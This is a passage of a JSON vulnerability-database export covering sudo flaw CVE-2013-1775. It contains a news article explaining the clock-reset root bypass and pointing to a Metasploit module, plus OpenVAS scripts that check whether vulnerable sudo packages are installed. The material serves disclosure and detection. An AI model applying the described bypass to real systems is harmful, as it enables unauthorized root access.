"CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2017-01-08T18:01:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-1775"], "description": "[](<http://1.bp.blogspot.com/-p4Nui4O4jQY/UiDkJph071I/AAAAAAAAXaI/FXSMCOCLLxA/s1600/Apple+Mac+OS+X+Vulnerability+enables+Super+User+to+Hackers+by+resetting+the+clock.png>)\n\nDo you think, because you\u2019re using an [Apple Mac](<http://thehackernews.com/search/label/Apple>), your data is safe from hackers ? Well, it is not true, there are dozens of security weaknesses and today Researchers have made it easier to exploit Apple Mac OS X, that allows penetration testers and hackers to gain root access. \n \nThe flaw remained unmatched by Apple for the last five months, dubbed [CVE-2013-1775](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775>), the flaw allowed attackers to bypass normal [password](<http://thehackernews.com/2013/05/cracking-16-character-strong-passwords.html>) authentication procedures by resetting the computer clock to January 1, 1970. \nThe reason that specific date is required is because it represents the beginning of time to the [operating system ](<http://thehackernews.com/2013/02/firefox-os-for-smartphones-incredible.html>)and some applications that run on it. When the SUDO command is used in combination with a clock reset, the computer can be tracked into providing root access without a password. \n \n[Metasploit](<http://thehackernews.com/search/label/Metasploit>) authors have come up with a brand [new module](<http://www.rapid7.com/db/modules/exploit/osx/local/sudo_password_bypass>) that makes the bug even easier to [exploit](<http://thehackernews.com/search/label/exploit%20code>), renewing interest in the problem. The module gains a session with root permissions as long as the user ran the SUDO command before and as long as they have administrative privileges. \n \nH.D. Moore, founder of Metasploit, warned that this was a serious [vulnerability](<http://thehackernews.com/search/label/Vulnerability>): \u201c_The bug is significant because it allows any user-level compromise to become root, which in turn exposes things like clear-text passwords from Keychain and makes it possible for the intruder to install a permanent ______rootkit_.\u201d \n \nIn addition, the hacker needs to have either physical or remote access to the machine. Apple has yet to respond or issue a patch for the bug. As a result, all versions of the operating system from OS X 10.7 to the current 10.8.4 are affected. \n\n\n \n\n\nMost of the recent exploits of Mac OS X have been related to Java, which Apple completely blocked earlier this year over security vulnerabilities.\n", "modified": "2013-08-30T18:32:35", "published": "2013-08-30T07:32:00", "id": "THN:7BDF45E62E28D5D2D535B9AE55F8A825", "href": "http://thehackernews.com/2013/08/apple-mac-os-x-vulnerability-enables.html", "type": "thn", "title": "Apple Mac OS X Vulnerability enables Root User to Hackers by resetting the clock", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-01-26T11:10:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775"], "description": "Check for the Version of sudo", "modified": "2018-01-25T00:00:00", "published": "2013-03-05T00:00:00", "id": "OPENVAS:841349", "href": "http://plugins.openvas.org/nasl.php?oid=841349", "type": "openvas", "title": "Ubuntu Update for sudo USN-1754-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1754_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# Ubuntu Update for sudo USN-1754-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"sudo on Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_insight = \"Marco Schoepl discovered that Sudo incorrectly handled time stamp files\n when the system clock is set to epoch. A local attacker could use this\n issue to run Sudo commands without a password prompt.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1754-1/\");\n script_id(841349);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:49:10 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1754-1\");\n script_name(\"Ubuntu Update for sudo USN-1754-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-05T00:00:00", "id": "OPENVAS:1361412562310841349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841349", "type": "openvas", "title": "Ubuntu Update for sudo USN-1754-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1754_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for sudo USN-1754-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1754-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841349\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:49:10 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1754-1\");\n script_name(\"Ubuntu Update for sudo USN-1754-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|11\\.10|10\\.04 LTS|8\\.04 LTS|12\\.10)\");\n script_tag(name:\"affected\", value:\"sudo on Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"insight\", value:\"Marco Schoepl discovered that Sudo incorrectly handled time stamp files\n when the system clock is set to epoch. A local attacker could use this\n issue to run Sudo commands without a password prompt.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-19T00:00:00", "id": "OPENVAS:1361412562310865477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865477", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2013-3297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2013-3297\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100157.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865477\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-19 09:37:05 +0530 (Tue, 19 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-3297\");\n script_name(\"Fedora Update for sudo FEDORA-2013-3297\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"sudo on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p7~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:51:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "Check for the Version of sudo", "modified": "2017-07-10T00:00:00", "published": "2013-03-19T00:00:00", "id": "OPENVAS:865477", "href": "http://plugins.openvas.org/nasl.php?oid=865477", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2013-3297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2013-3297\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"sudo on Fedora 18\";\ntag_insight = \"Sudo (superuser do) allows a system administrator to give certain\n users (or groups of users) the ability to run some (or all) commands\n as root while logging all commands and arguments. Sudo operates on a\n per-command basis. It is not a replacement for the shell. Features\n include: the ability to restrict what commands a user may run on a\n per-host basis, copious logging of each command (providing a clear\n audit trail of who did what), a configurable timeout of the sudo\n command, and the ability to use the same configuration file (sudoers)\n on many different machines.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100157.html\");\n script_id(865477);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-19 09:37:05 +0530 (Tue, 19 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3297\");\n script_name(\"Fedora Update for sudo FEDORA-2013-3297\");\n\n script_summary(\"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p7~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:1361412562310871048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871048", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1353-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1353-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871048\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:17:42 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1353-01\");\n\n\n script_tag(name:\"affected\", value:\"sudo on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"insight\", value:\"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n * Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n * Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n * Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n * Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n\n - -s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1353-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-September/msg00055.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, 